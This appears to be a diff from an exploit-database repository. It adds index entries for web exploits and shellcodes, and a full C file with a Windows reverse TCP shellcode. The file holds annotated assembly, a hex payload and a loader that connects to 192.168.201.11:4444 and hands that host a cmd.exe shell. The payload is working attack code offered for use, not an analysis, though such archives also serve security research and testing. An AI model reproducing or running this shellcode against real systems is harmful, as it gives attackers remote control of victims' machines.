50264,exploits/php/webapps/50264.py,"Patient Appointment Scheduler System 1.0 - Unauthenticated File Upload",1970-01-01,a-rey,webapps,php,
50267,exploits/multiple/webapps/50267.txt,"Antminer Monitor 0.5.0 - Authentication Bypass",1970-01-01,Vulnz,webapps,multiple,
50268,exploits/php/webapps/50268.txt,"WordPress Plugin WP Sitemap Page 1.6.4 - Stored Cross-Site Scripting (XSS)",1970-01-01,"Nikhil Kapoor",webapps,php,
50269,exploits/php/webapps/50269.py,"WordPress Plugin Survey & Poll 1.5.7.3 - 'sss_params' SQL Injection (2)",1970-01-01,"Mohin Paramasivam",webapps,php,
@ -44308,6 +44311,7 @@ id,file,description,date,author,type,platform,port
50323,exploits/php/webapps/50323.html,"Backdrop CMS 1.20.0 - 'Multiple' Cross-Site Request Forgery (CSRF)",1970-01-01,V1n1v131r4,webapps,php,
50324,exploits/php/webapps/50324.txt,"WordPress Plugin Advanced Order Export For WooCommerce 3.1.7 - Reflected Cross-Site Scripting (XSS)",1970-01-01,0xB9,webapps,php,
50325,exploits/php/webapps/50325.html,"WordPress Plugin Fitness Calculators 1.9.5 - Cross-Site Request Forgery (CSRF)",1970-01-01,0xB9,webapps,php,
50326,exploits/php/webapps/50326.txt,"Budget and Expense Tracker System 1.0 - Arbitrary File Upload",1970-01-01,"()t/\\/\\1",webapps,php,
50327,exploits/php/webapps/50327.txt,"Police Crime Record Management Project 1.0 - Time Based SQLi",1970-01-01,"()t/\\/\\1",webapps,php,
50328,exploits/aspx/webapps/50328.txt,"SmarterTools SmarterTrack 7922 - 'Multiple' Information Disclosure",1970-01-01,"Andrei Manole",webapps,aspx,
50329,exploits/php/webapps/50329.txt,"Pharmacy Point of Sale System 1.0 - SQLi Authentication BYpass",1970-01-01,"Janik Wehrli",webapps,php,
@ -44315,11 +44319,14 @@ id,file,description,date,author,type,platform,port
50334,exploits/php/webapps/50334.txt,"Library System 1.0 - 'student_id' SQL injection (Authenticated)",1970-01-01,"Vinay Bhuria",webapps,php,
50339,exploits/hardware/webapps/50339.txt,"FatPipe Networks WARP 10.2.2 - Authorization Bypass",1970-01-01,LiquidWorm,webapps,hardware,
50340,exploits/hardware/webapps/50340.txt,"FatPipe Networks WARP/IPVPN/MPVPN 10.2.2 - Config Download (Unauthenticated)",1970-01-01,LiquidWorm,webapps,hardware,
50341,exploits/hardware/webapps/50341.txt,"FatPipe Networks WARP/IPVPN/MPVPN 10.2.2 - Hidden Backdoor Account (Write Access)",1970-01-01,LiquidWorm,webapps,hardware,
50342,exploits/hardware/webapps/50342.py,"FatPipe Networks WARP/IPVPN/MPVPN 10.2.2 - Remote Privilege Escalation",1970-01-01,LiquidWorm,webapps,hardware,
50343,exploits/php/webapps/50343.txt,"WordPress Plugin TranslatePress 2.0.8 - Stored Cross-Site Scripting (XSS) (Authenticated)",1970-01-01,"Nosa Shandy",webapps,php,
50344,exploits/php/webapps/50344.txt,"WordPress Plugin Contact Form 1.7.14 - Reflected Cross-Site Scripting (XSS)",1970-01-01,0xB9,webapps,php,
50345,exploits/php/webapps/50345.txt,"WordPress Plugin Ultimate Maps 1.2.4 - Reflected Cross-Site Scripting (XSS)",1970-01-01,0xB9,webapps,php,
50346,exploits/php/webapps/50346.txt,"WordPress Plugin Popup 1.10.4 - Reflected Cross-Site Scripting (XSS)",1970-01-01,0xB9,webapps,php,
50348,exploits/php/webapps/50348.py,"Storage Unit Rental Management System 1.0 - Remote Code Execution (RCE) (Unauthenticated)",1970-01-01,Ghuliev,webapps,php,
50350,exploits/php/webapps/50350.txt,"WordPress Plugin Redirect 404 to Parent 1.3.0 - Reflected Cross-Site Scripting",1970-01-01,0xB9,webapps,php,
50352,exploits/php/webapps/50352.txt,"OpenSIS 8.0 - 'cp_id_miss_attn' Reflected Cross-Site Scripting (XSS)",1970-01-01,"Eric Salario",webapps,php,
50353,exploits/php/webapps/50353.php,"Pet Shop Management System 1.0 - Remote Code Execution (RCE) (Unauthenticated)",1970-01-01,Mr.Gedik,webapps,php,
50355,exploits/php/webapps/50355.txt,"Cyber Cafe Management System Project (CCMS) 1.0 - SQL Injection Authentication Bypass",1970-01-01,"Sanjay Singh",webapps,php,
@ -44383,3 +44390,6 @@ id,file,description,date,author,type,platform,port
50437,exploits/windows/webapps/50437.txt,"Easy Chat Server 3.1 - Directory Traversal and Arbitrary File Read",1970-01-01,z4nd3r,webapps,windows,
50432,exploits/php/webapps/50432.txt,"Dolibarr ERP-CRM 14.0.2 - Stored Cross-Site Scripting (XSS) / Privilege Escalation",1970-01-01,"Oscar Gil Gutierrez",webapps,php,
50435,exploits/php/webapps/50435.txt,"Small CRM 3.0 - 'description' Stored Cross-Site Scripting (XSS)",1970-01-01,Ghuliev,webapps,php,
50438,exploits/java/webapps/50438.txt,"Jetty 9.4.37.v20210219 - Information Disclosure",1970-01-01,"Mayank Deshmukh",webapps,java,
50439,exploits/php/webapps/50439.py,"Clinic Management System 1.0 - SQL injection to Remote Code Execution",1970-01-01,"Pablo Santiago",webapps,php,
50440,exploits/php/webapps/50440.txt,"Online Course Registration 1.0 - Blind Boolean-Based SQL Injection (Authenticated)",1970-01-01,"Sam Ferguson",webapps,php,

Can't render this file because it is too large.

1
files_shellcodes.csv
View file

@ -1025,3 +1025,4 @@ id,file,description,date,author,type,platform
48592,shellcodes/linux_x86/48592.c,"Linux/x86 - Disable ASLR Security + Polymorphic Shellcode (124 bytes)",1970-01-01,"Xenofon Vassilakopoulos",shellcode,linux_x86
48703,shellcodes/linux_x86/48703.c,"Linux/x86 - Egghunter (0x50905090) + sigaction + execve(/bin/sh) Shellcode (35 bytes)",1970-01-01,danf42,shellcode,linux_x86
48718,shellcodes/windows_x86/48718.c,"Windows/x86 - Download File (http://192.168.43.192:8080/9MKWaRO.hta) Via mshta Shellcode (100 bytes)",1970-01-01,"Siddharth Sharma",shellcode,windows_x86
50291,shellcodes/windows_x86-64/50291.c,"Windows/x64 - Reverse TCP (192.168.201.11:4444) Shellcode (330 Bytes)",1970-01-01,"Xenofon Vassilakopoulos",shellcode,windows_x86-64

1 id file description date author type platform
1025 48592 shellcodes/linux_x86/48592.c Linux/x86 - Disable ASLR Security + Polymorphic Shellcode (124 bytes) 1970-01-01 Xenofon Vassilakopoulos shellcode linux_x86
1026 48703 shellcodes/linux_x86/48703.c Linux/x86 - Egghunter (0x50905090) + sigaction + execve(/bin/sh) Shellcode (35 bytes) 1970-01-01 danf42 shellcode linux_x86
1027 48718 shellcodes/windows_x86/48718.c Windows/x86 - Download File (http://192.168.43.192:8080/9MKWaRO.hta) Via mshta Shellcode (100 bytes) 1970-01-01 Siddharth Sharma shellcode windows_x86
1028 50291 shellcodes/windows_x86-64/50291.c Windows/x64 - Reverse TCP (192.168.201.11:4444) Shellcode (330 Bytes) 1970-01-01 Xenofon Vassilakopoulos shellcode windows_x86-64

290
shellcodes/windows_x86-64/50291.c Normal file
View file

@ -0,0 +1,290 @@
# Title: Windows/x64 - Reverse TCP (192.168.201.11:4444) Shellcode (330 Bytes)
# Date: 09.12.2021
# Author: Xenofon Vassilakopoulos
# Tested on: Windows/x64 - 10.0.19043 N/A Build 19043
/*
MIT License
Copyright (c) 2021 Xenofon Vassilakopoulos
Permission is hereby granted, free of charge, to any person obtaining a copy
of this software and associated documentation files (the "Software"), to deal
in the Software without restriction, including without limitation the rights
to use, copy, modify, merge, publish, distribute, sublicense, and/or sell
copies of the Software, and to permit persons to whom the Software is
furnished to do so, subject to the following conditions:
The above copyright notice and this permission notice shall be included in all
copies or substantial portions of the Software.
THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR
IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE
AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER
LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,
OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE
SOFTWARE.
[BITS 32]
global _start
section .text
_start:
; Locate Kernelbase.dll address
XOR ECX, ECX ;zero out ECX
MOV EAX, FS:[ecx + 0x30] ;EAX = PEB
MOV EAX, [EAX + 0x0c] ;EAX = PEB->Ldr
MOV ESI, [EAX + 0x14] ;ESI = PEB->Ldr.InMemoryOrderModuleList
LODSD ;memory address of the second list entry structure
XCHG EAX, ESI ;EAX = ESI , ESI = EAX
LODSD ;memory address of the third list entry structure
XCHG EAX, ESI ;EAX = ESI , ESI = EAX
LODSD ;memory address of the fourth list entry structure
MOV EBX, [EAX + 0x10] ;EBX = Base address
; Export Table
MOV EDX, DWORD [EBX + 0x3C] ;EDX = DOS->e_lfanew
ADD EDX, EBX ;EDX = PE Header
MOV EDX, DWORD [EDX + 0x78] ;EDX = Offset export table
ADD EDX, EBX ;EDX = Export table
MOV ESI, DWORD [EDX + 0x20] ;ESI = Offset names table
ADD ESI, EBX ;ESI = Names table
XOR ECX, ECX ;EXC = 0
GetFunction :
INC ECX; increment counter
LODSD ;Get name offset
ADD EAX, EBX ;Get function name
CMP dword [EAX], 0x50746547 ;"PteG"
JNZ SHORT GetFunction ;jump to GetFunction label if not "GetP"
CMP dword [EAX + 0x4], 0x41636F72 ;"rocA"
JNZ SHORT GetFunction ;jump to GetFunction label if not "rocA"
CMP dword [EAX + 0x8], 0x65726464 ;"ddre"
JNZ SHORT GetFunction ;jump to GetFunction label if not "ddre"
MOV ESI, DWORD [EDX + 0x24] ;ESI = Offset ordinals
ADD ESI, EBX ;ESI = Ordinals table
MOV CX, WORD [ESI + ECX * 2] ;CX = Number of function
DEC ECX ;Decrement the ordinal
MOV ESI, DWORD [EDX + 0x1C] ;ESI = Offset address table
ADD ESI, EBX ;ESI = Address table
MOV EDX, DWORD [ESI + ECX * 4] ;EDX = Pointer(offset)
ADD EDX, EBX ;EDX = GetProcAddress
; Get the Address of LoadLibraryA function
XOR ECX, ECX ;ECX = 0
PUSH EBX ;Kernel32 base address
PUSH EDX ;GetProcAddress
PUSH ECX ;0
PUSH 0x41797261 ;"Ayra"
PUSH 0x7262694C ;"rbiL"
PUSH 0x64616F4C ;"daoL"
PUSH ESP ;"LoadLibrary"
PUSH EBX ;Kernel32 base address
MOV ESI, EBX ;save the kernel32 address in esi for later
CALL EDX ;GetProcAddress(LoadLibraryA)
ADD ESP, 0xC ;pop "LoadLibraryA"
POP EDX ;EDX = 0
PUSH EAX ;EAX = LoadLibraryA
PUSH EDX ;ECX = 0
MOV DX, 0x6C6C ;"ll"
PUSH EDX
PUSH 0x642E3233 ;"d.23"
PUSH 0x5F327377 ;"_2sw"
PUSH ESP ;"ws2_32.dll"
CALL EAX ;LoadLibrary("ws2_32.dll")
ADD ESP, 0x10 ;Clean stack
MOV EDX, [ESP + 0x4] ;EDX = GetProcAddress
PUSH 0x61617075 ;"aapu"
SUB word [ESP + 0x2], 0x6161 ;"pu" (remove "aa")
PUSH 0x74726174 ;"trat"
PUSH 0x53415357 ;"SASW"
PUSH ESP ;"WSAStartup"
PUSH EAX ;ws2_32.dll address
MOV EDI, EAX ;save ws2_32.dll to use it later
CALL EDX ;GetProcAddress(WSAStartup)
; Call WSAStartUp
XOR EBX, EBX ;zero out ebx register
MOV BX, 0x0190 ;EAX = sizeof(struct WSAData)
SUB ESP, EBX ;allocate space for the WSAData structure
PUSH ESP ;push a pointer to WSAData structure
PUSH EBX ;Push EBX as wVersionRequested
CALL EAX ;Call WSAStartUp
;Find the address of WSASocketA
ADD ESP, 0x10 ;Align the stack
XOR EBX, EBX ;zero out the EBX register
ADD BL, 0x4 ;add 0x4 at the lower register BL
IMUL EBX, 0x64 ;EBX = 0x190
MOV EDX, [ESP + EBX] ;EDX has the address of GetProcAddress
PUSH 0x61614174 ;"aaAt"
SUB word [ESP + 0x2], 0x6161 ;"At" (remove "aa")
PUSH 0x656b636f ;"ekco"
PUSH 0x53415357 ;"SASW"
PUSH ESP ;"WSASocketA", GetProcAddress 2nd argument
MOV EAX, EDI ;EAX now holds the ws2_32.dll address
PUSH EAX ;push the first argument of GetProcAddress
CALL EDX ;call GetProcAddress
PUSH EDI ;save the ws2_32.dll address to use it later
;call WSASocketA
XOR ECX, ECX ;zero out ECX register
PUSH EDX ;null value for dwFlags argument
PUSH EDX ;zero value since we dont have an existing socket group
PUSH EDX ;null value for lpProtocolInfo
MOV DL, 0x6 ;IPPROTO_TCP
PUSH EDX ;set the protocol argument
INC ECX ;SOCK_STREAM(TCP)
PUSH ECX ;set the type argument
INC ECX ;AF_INET(IPv4)
PUSH ECX ;set the ddress family specification argument
CALL EAX ;call WSASocketA
XCHG EAX, ECX ;save the socket returned from WSASocketA at EAX to ECX in order to use it later
;Find the address of connect
POP EDI ;load previously saved ws2_32.dll address to ECX
ADD ESP, 0x10 ;Align stack
XOR EBX, EBX ;zero out EBX
ADD BL, 0x4 ;add 0x4 to lower register BL
IMUL EBX, 0x63 ;EBX = 0x18c
MOV EDX, [ESP + EBX] ;EDX has the address of GetProcAddress
PUSH 0x61746365 ;"atce"
SUB word [ESP + 0x3], 0x61 ;"tce" (remove "a")
PUSH 0x6e6e6f63 ;"nnoc"
PUSH ESP ;"connect", second argument of GetProcAddress
PUSH EDI ;ws32_2.dll address, first argument of GetProcAddress
XCHG ECX, EBP
CALL EDX ;call GetProcAddress
;call connect
PUSH 0x0bc9a8c0 ;sin_addr set to 192.168.201.11
PUSH word 0x5c11 ;port = 4444
XOR EBX, EBX ;zero out EBX
add BL, 0x2 ;TCP protocol
PUSH word BX ;push the protocol value on the stack
MOV EDX, ESP ;pointer to sockaddr structure (IP,Port,Protocol)
PUSH byte 16 ;the size of sockaddr - 3rd argument of connect
PUSH EDX ;push the sockaddr - 2nd argument of connect
PUSH EBP ;socket descriptor = 64 - 1st argument of connect
XCHG EBP, EDI
CALL EAX ;execute connect;
;Find the address of CreateProcessA
ADD ESP, 0x14 ;Clean stack
XOR EBX, EBX ;zero out EBX
ADD BL, 0x4 ;add 0x4 to lower register BL
IMUL EBX, 0x62 ;EBX = 0x194
MOV EDX, [ESP + EBX] ;EDX has the address of GetProcAddress
PUSH 0x61614173 ;"aaAs"
SUB dword [ESP + 0x2], 0x6161 ;"As"
PUSH 0x7365636f ;"seco"
PUSH 0x72506574 ;"rPet"
PUSH 0x61657243 ;"aerC"
PUSH ESP ;"CreateProcessA" - 2nd argument of GetProcAddress
MOV EBP, ESI ;move the kernel32.dll to EBP
PUSH EBP ;kernel32.dll address - 1st argument of GetProcAddress
CALL EDX ;execute GetProcAddress
PUSH EAX ;address of CreateProcessA
LEA EBP, [EAX] ;EBP now points to the address of CreateProcessA
;call CreateProcessA
PUSH 0x61646d63 ;"admc"
SUB word [ESP + 0x3], 0x61 ;"dmc" ( remove a)
MOV ECX, ESP ;ecx now points to "cmd" string
XOR EDX, EDX ;zero out EDX
SUB ESP, 16
MOV EBX, esp ;pointer for ProcessInfo
;STARTUPINFOA struct
PUSH EDI ;hStdError => saved socket
PUSH EDI ;hStdOutput => saved socket
PUSH EDI ;hStdInput => saved socket
PUSH EDX ;lpReserved2 => NULL
PUSH EDX ;cbReserved2 => NULL
XOR EAX, EAX ;zero out EAX register
INC EAX ;EAX => 0x00000001
ROL EAX, 8 ;EAX => 0x00000100
PUSH EAX ;dwFlags => STARTF_USESTDHANDLES 0x00000100
PUSH EDX ;dwFillAttribute => NULL
PUSH EDX ;dwYCountChars => NULL
PUSH EDX ;dwXCountChars => NULL
PUSH EDX ;dwYSize => NULL
PUSH EDX ;dwXSize => NULL
PUSH EDX ;dwY => NULL
PUSH EDX ;dwX => NULL
PUSH EDX ;pTitle => NULL
PUSH EDX ;pDesktop => NULL
PUSH EDX ;pReserved => NULL
XOR EAX, EAX ;zero out EAX
ADD AL, 44 ;cb => 0x44 (size of struct)
PUSH EAX ;eax points to STARTUPINFOA
;ProcessInfo struct
MOV EAX, ESP ;pStartupInfo
PUSH EBX ;pProcessInfo
PUSH EAX ;pStartupInfo
PUSH EDX ;CurrentDirectory => NULL
PUSH EDX ;pEnvironment => NULL
PUSH EDX ;CreationFlags => 0
XOR EAX, EAX ;zero out EAX register
INC EAX ;EAX => 0x00000001
PUSH EAX ;InheritHandles => TRUE => 1
PUSH EDX ;pThreadAttributes => NULL
PUSH EDX ;pProcessAttributes => NULL
PUSH ECX ;pCommandLine => pointer to "cmd"
PUSH EDX ;ApplicationName => NULL
CALL EBP ;execute CreateProcessA
*/
#include <windows.h>
#include <iostream>
#include <stdlib.h>
char code[] =
"\x31\xc9\x64\x8b\x41\x30\x8b\x40\x0c\x8b\x70\x14\xad\x96\xad\x96\xad\x8b"
"\x58\x10\x8b\x53\x3c\x01\xda\x8b\x52\x78\x01\xda\x8b\x72\x20\x01\xde\x31"
"\xc9\x41\xad\x01\xd8\x81\x38\x47\x65\x74\x50\x75\xf4\x81\x78\x04\x72\x6f"
"\x63\x41\x75\xeb\x81\x78\x08\x64\x64\x72\x65\x75\xe2\x8b\x72\x24\x01\xde"
"\x66\x8b\x0c\x4e\x49\x8b\x72\x1c\x01\xde\x8b\x14\x8e\x01\xda\x31\xc9\x53"
"\x52\x51\x68\x61\x72\x79\x41\x68\x4c\x69\x62\x72\x68\x4c\x6f\x61\x64\x54"
"\x53\x89\xde\xff\xd2\x83\xc4\x0c\x5a\x50\x52\x66\xba\x6c\x6c\x52\x68\x33"
"\x32\x2e\x64\x68\x77\x73\x32\x5f\x54\xff\xd0\x83\xc4\x10\x8b\x54\x24\x04"
"\x68\x75\x70\x61\x61\x66\x81\x6c\x24\x02\x61\x61\x68\x74\x61\x72\x74\x68"
"\x57\x53\x41\x53\x54\x50\x89\xc7\xff\xd2\x31\xdb\x66\xbb\x90\x01\x29\xdc"
"\x54\x53\xff\xd0\x83\xc4\x10\x31\xdb\x80\xc3\x04\x6b\xdb\x64\x8b\x14\x1c"
"\x68\x74\x41\x61\x61\x66\x81\x6c\x24\x02\x61\x61\x68\x6f\x63\x6b\x65\x68"
"\x57\x53\x41\x53\x54\x89\xf8\x50\xff\xd2\x57\x31\xc9\x52\x52\x52\xb2\x06"
"\x52\x41\x51\x41\x51\xff\xd0\x91\x5f\x83\xc4\x10\x31\xdb\x80\xc3\x04\x6b"
"\xdb\x63\x8b\x14\x1c\x68\x65\x63\x74\x61\x66\x83\x6c\x24\x03\x61\x68\x63"
"\x6f\x6e\x6e\x54\x57\x87\xcd\xff\xd2\x68\xc0\xa8\xc9\x0b\x66\x68\x11\x5c"
"\x31\xdb\x80\xc3\x02\x66\x53\x89\xe2\x6a\x10\x52\x55\x87\xef\xff\xd0\x83"
"\xc4\x14\x31\xdb\x80\xc3\x04\x6b\xdb\x62\x8b\x14\x1c\x68\x73\x41\x61\x61"
"\x81\x6c\x24\x02\x61\x61\x00\x00\x68\x6f\x63\x65\x73\x68\x74\x65\x50\x72"
"\x68\x43\x72\x65\x61\x54\x89\xf5\x55\xff\xd2\x50\x8d\x28\x68\x63\x6d\x64"
"\x61\x66\x83\x6c\x24\x03\x61\x89\xe1\x31\xd2\x83\xec\x10\x89\xe3\x57\x57"
"\x57\x52\x52\x31\xc0\x40\xc1\xc0\x08\x50\x52\x52\x52\x52\x52\x52\x52\x52"
"\x52\x52\x31\xc0\x04\x2c\x50\x89\xe0\x53\x50\x52\x52\x52\x31\xc0\x40\x50"
"\x52\x52\x51\x52\xff\xd5";
int main(int argc, char** argv)
{
//HWND hWnd = GetConsoleWindow();
//ShowWindow(hWnd, SW_HIDE);
printf("Shellcode Length: %d\n", strlen(code));
void* exec = VirtualAlloc(0, strlen(code), MEM_COMMIT, PAGE_EXECUTE_READWRITE);
memcpy(exec, code, sizeof(code));
((void(*)())exec)();
return 0;
}